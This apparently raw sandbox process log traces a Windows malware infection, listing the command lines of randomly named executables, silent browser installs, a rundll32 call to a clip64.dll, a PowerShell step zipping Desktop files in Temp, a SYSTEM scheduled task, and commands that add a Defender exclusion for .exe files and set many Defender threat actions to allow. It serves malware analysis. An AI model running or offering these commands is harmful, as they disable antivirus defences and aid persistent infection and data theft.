"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1936,i,6953059893737183317,2075396238510464427,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2216 --field-trial-handle=1936,i,6953059893737183317,2075396238510464427,131072 /prefetch:8

C:\Users\Admin\Pictures\SUjb9Up84Rw8tmFImFpNS5X8.exe

"C:\Users\Admin\Pictures\SUjb9Up84Rw8tmFImFpNS5X8.exe"

C:\Users\Admin\Pictures\Tq7u51xB7kGO6x2EiTsCQngJ.exe

"C:\Users\Admin\Pictures\Tq7u51xB7kGO6x2EiTsCQngJ.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3064 --field-trial-handle=1936,i,6953059893737183317,2075396238510464427,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3100 --field-trial-handle=1936,i,6953059893737183317,2075396238510464427,131072 /prefetch:1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameServerClient\installg.bat" "

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4244 --field-trial-handle=1936,i,6953059893737183317,2075396238510464427,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4296 --field-trial-handle=1936,i,6953059893737183317,2075396238510464427,131072 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,13290185478610148420,15821952867166750021,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,13290185478610148420,15821952867166750021,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,13290185478610148420,15821952867166750021,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2912 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13290185478610148420,15821952867166750021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13290185478610148420,15821952867166750021,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1

C:\Users\Admin\Pictures\JxSE1viobyTMzUdd6pr1jYEY.exe

"C:\Users\Admin\Pictures\JxSE1viobyTMzUdd6pr1jYEY.exe"

C:\Users\Admin\Pictures\WUjqLI0y9xE0qFjc74GfaVjZ.exe

"C:\Users\Admin\Pictures\WUjqLI0y9xE0qFjc74GfaVjZ.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4076 --field-trial-handle=1936,i,6953059893737183317,2075396238510464427,131072 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13290185478610148420,15821952867166750021,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1656 --field-trial-handle=1936,i,6953059893737183317,2075396238510464427,131072 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\Pictures\O1c4ldHHgJFVg5LLZai7o8Hy.exe

"C:\Users\Admin\Pictures\O1c4ldHHgJFVg5LLZai7o8Hy.exe"

C:\Users\Admin\Pictures\RSM6CiUtofKuWBEZT3YoJA2v.exe

"C:\Users\Admin\Pictures\RSM6CiUtofKuWBEZT3YoJA2v.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\597858682981_Desktop.zip' -CompressionLevel Optimal

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13290185478610148420,15821952867166750021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13290185478610148420,15821952867166750021,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main

C:\Users\Admin\Pictures\qOUAgB63FuuHS2R8dK3BVAuF.exe

"C:\Users\Admin\Pictures\qOUAgB63FuuHS2R8dK3BVAuF.exe"

C:\Users\Admin\Pictures\dwH8FokgOu20Z9ZQ360ELUmq.exe

"C:\Users\Admin\Pictures\dwH8FokgOu20Z9ZQ360ELUmq.exe" --silent --allusers=0

C:\Users\Admin\Pictures\dwH8FokgOu20Z9ZQ360ELUmq.exe

C:\Users\Admin\Pictures\dwH8FokgOu20Z9ZQ360ELUmq.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x29c,0x2a0,0x2a4,0x278,0x2a8,0x6bbde1d0,0x6bbde1dc,0x6bbde1e8

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\dwH8FokgOu20Z9ZQ360ELUmq.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\dwH8FokgOu20Z9ZQ360ELUmq.exe" --version

C:\Windows\SysWOW64\sc.exe

Sc delete GameServerClient

C:\Users\Admin\Pictures\dwH8FokgOu20Z9ZQ360ELUmq.exe

"C:\Users\Admin\Pictures\dwH8FokgOu20Z9ZQ360ELUmq.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5072 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240425172628" --session-guid=b200a801-0345-4bac-b0d3-5d2104abafd8 --server-tracking-blob="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 " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=4C04000000000000

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13290185478610148420,15821952867166750021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13290185478610148420,15821952867166750021,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\u4a4.0.exe

"C:\Users\Admin\AppData\Local\Temp\u4a4.0.exe"

C:\Users\Admin\Pictures\dwH8FokgOu20Z9ZQ360ELUmq.exe

C:\Users\Admin\Pictures\dwH8FokgOu20Z9ZQ360ELUmq.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x298,0x2a8,0x2ac,0x274,0x2b0,0x6b0ce1d0,0x6b0ce1dc,0x6b0ce1e8

C:\Users\Admin\Pictures\Btf5cq1Bmhr53WKazgbpOEpg.exe

"C:\Users\Admin\Pictures\Btf5cq1Bmhr53WKazgbpOEpg.exe"

C:\Users\Admin\Pictures\afis2GlxSRlazYtAhh6nmdeH.exe

"C:\Users\Admin\Pictures\afis2GlxSRlazYtAhh6nmdeH.exe" --silent --allusers=0

C:\Users\Admin\Pictures\afis2GlxSRlazYtAhh6nmdeH.exe

C:\Users\Admin\Pictures\afis2GlxSRlazYtAhh6nmdeH.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6a18e1d0,0x6a18e1dc,0x6a18e1e8

C:\Program Files (x86)\GameServerClient\GameService.exe

GameService remove GameServerClient confirm

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\afis2GlxSRlazYtAhh6nmdeH.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\afis2GlxSRlazYtAhh6nmdeH.exe" --version

C:\Users\Admin\AppData\Local\Temp\7zS562A.tmp\Install.exe

.\Install.exe /RvdidblCuX "385118" /S

C:\Users\Admin\AppData\Local\Temp\u52w.0.exe

"C:\Users\Admin\AppData\Local\Temp\u52w.0.exe"

C:\Users\Admin\AppData\Local\Temp\u4a4.2\run.exe

"C:\Users\Admin\AppData\Local\Temp\u4a4.2\run.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Users\Admin\AppData\Local\Temp\u52w.2\run.exe

"C:\Users\Admin\AppData\Local\Temp\u52w.2\run.exe"

C:\Users\Admin\AppData\Local\Temp\u4a4.3.exe

"C:\Users\Admin\AppData\Local\Temp\u4a4.3.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 7364 -ip 7364

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 1616

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7364 -s 1204

C:\Users\Admin\Pictures\uj9zf1WQ2J1PKGLCSCT6a98V.exe

"C:\Users\Admin\Pictures\uj9zf1WQ2J1PKGLCSCT6a98V.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 6584 -ip 6584

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6584 -s 1412

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 17:27:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\MATpqzT.exe\" em /YOsite_idnfL 385118 /S" /V1 /F

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Program Files (x86)\GameServerClient\GameService.exe

GameService install GameServerClient "C:\Program Files (x86)\GameServerClient\GameServerClient.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 6112 -ip 6112

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 1016

C:\Program Files (x86)\GameServerClient\GameService.exe

GameService start GameServerClient

C:\Program Files (x86)\GameServerClient\GameService.exe

"C:\Program Files (x86)\GameServerClient\GameService.exe"

C:\Program Files (x86)\GameServerClient\GameServerClient.exe

"C:\Program Files (x86)\GameServerClient\GameServerClient.exe"

C:\Windows\Temp\677655.exe

"C:\Windows\Temp\677655.exe" --list-devices

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251726281\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251726281\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameServerClient\installc.bat" "

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251726281\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251726281\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251726281\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251726281\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x11b6038,0x11b6044,0x11b6050

C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\MATpqzT.exe

C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\MATpqzT.exe em /YOsite_idnfL 385118 /S

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\sc.exe

Sc delete GameServerClientC

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Program Files (x86)\GameServerClient\GameService.exe

GameService remove GameServerClientC confirm

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

